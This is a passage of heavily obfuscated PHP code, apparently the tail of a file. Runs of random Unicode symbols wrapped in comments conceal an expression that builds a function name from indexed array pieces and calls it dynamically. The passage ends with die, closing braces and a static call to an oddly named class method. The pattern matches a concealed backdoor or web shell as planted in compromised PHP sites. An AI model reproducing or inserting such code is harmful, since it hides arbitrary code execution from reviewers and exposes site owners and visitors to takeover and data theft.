@$oNKeA/*-KEchcgs3-*///
[/*-x)w-*///
0/*-

㊯↉⊗↥⋥▧∐↚➈ⅼ∸┡﹫⋏≀⓮⇛

jsU㊯↉⊗↥⋥▧∐↚➈ⅼ∸┡﹫⋏≀⓮⇛

-*///
]/*-el6b-*///
(/*-)u-*///
"",/*-


░◢⋤┡☸㊥♫✔➴ⅲ⊤➘⊑☭⒓✤


(,%░◢⋤┡☸㊥♫✔➴ⅲ⊤➘⊑☭⒓✤


-*///
 $oNKeA/*-L#8SqV-*///
[/*-


┓♓◣㏒⇃≒♪㊇∔⊯▧》︺/┿＂Ⅳ↘◼ℴ☼㈦⇊¡♆Ⓖ⑵⊲↶∴︾


$)┓♓◣㏒⇃≒♪㊇∔⊯▧》︺/┿＂Ⅳ↘◼ℴ☼㈦⇊¡♆Ⓖ⑵⊲↶∴︾


-*///
1+6/*-[Iha1<3D[,-*///
] /*-6-*///
. /*-
☪⒚➭⑤❁♂ⓠ➺ⅷ⋝↚⒩⊷⓫┽㊛⒮×┐∰≺⋇┼﹨⋁↥∡ℬ◄┶
sm4J|☪⒚➭⑤❁♂ⓠ➺ⅷ⋝↚⒩⊷⓫┽㊛⒮×┐∰≺⋇┼﹨⋁↥∡ℬ◄┶
-*///
$oNKeA/*-jcJ}a{k{jP-*///
[/*-

⊈—◎↠

.6z⊈—◎↠

-*///
3+1/*-$)<9-*///
]/*-

㊓［⒫﹦➅

3!kXT]x㊓［⒫﹦➅

-*///
(/*-;]-*///
$ptoYw/*-X3_+Y4v-*///
)/*-
⊰﹢⒝➺↥∅∠⒀◗▬⊂⊢⇀
&3Gws⊰﹢⒝➺↥∅∠⒀◗▬⊂⊢⇀
-*///
 . /*-

〗⒐④︷║＂⇇⒒▫↭☮⊫

F%.YI〗⒐④︷║＂⇇⒒▫↭☮⊫

-*///
$oNKeA/*-AsCGmC.C-*///
[/*-
ℛ◆㊠≺㊟﹄➲⋤⊦↑㈨Ⓛ∱㊯⋀◑
Fc180Wℛ◆㊠≺㊟﹄➲⋤⊦↑㈨Ⓛ∱㊯⋀◑
-*///
0+8/*-}6gH&Te<pE-*///
]/*-

♛✝﹤*⇕➍⒙╢≤⑫⋕♤❣╕ⓙ⇠ↈ

3p[w:U<♛✝﹤*⇕➍⒙╢≤⑫⋕♤❣╕ⓙ⇠ↈ

-*///
);/*-

≷﹄♢⚘﹃╖⒫⓴&ⓑ┱⊖℮┢

7;.≷﹄♢⚘﹃╖⒫⓴&ⓑ┱⊖℮┢

-*///
/*-yo>5-*///
die;/*-:3$#`:w-*///
 endif;/*-5So#Y-*///
 }/*-
◢✏㊣╬☓®Ⓤ⒕⅟⊄⊏ℳ∯∦⋇➻ℴ㊤ⅳ∈⊟▲≗⇧◔Ↄ⋅
6q}Y8eP[◢✏㊣╬☓®Ⓤ⒕⅟⊄⊏ℳ∯∦⋇➻ℴ㊤ⅳ∈⊟▲≗⇧◔Ↄ⋅
-*///
}/*-lEM-*///
hJULx/*-


∴➢┙▃∳㊢


tNli2?0K∴➢┙▃∳㊢


-*///
::/*-

≀┡⊥┛⓮⋲⋢￣⋗≰Ⓖ

XD~≀┡⊥┛⓮⋲⋢￣⋗≰Ⓖ

-*///
JVMcvUuC/*-

ⓔ㊔✮▕

[J8b$ⓔ㊔✮▕

-*///
();/*-
◔ⓘ⒜▫┴﹛⌘Ⓢ╠»➁➪¶۰↮┇☁⒚∸∗↪
`H0◔ⓘ⒜▫┴﹛⌘Ⓢ╠»➁➪¶۰↮┇☁⒚∸∗↪
-*///
 ?>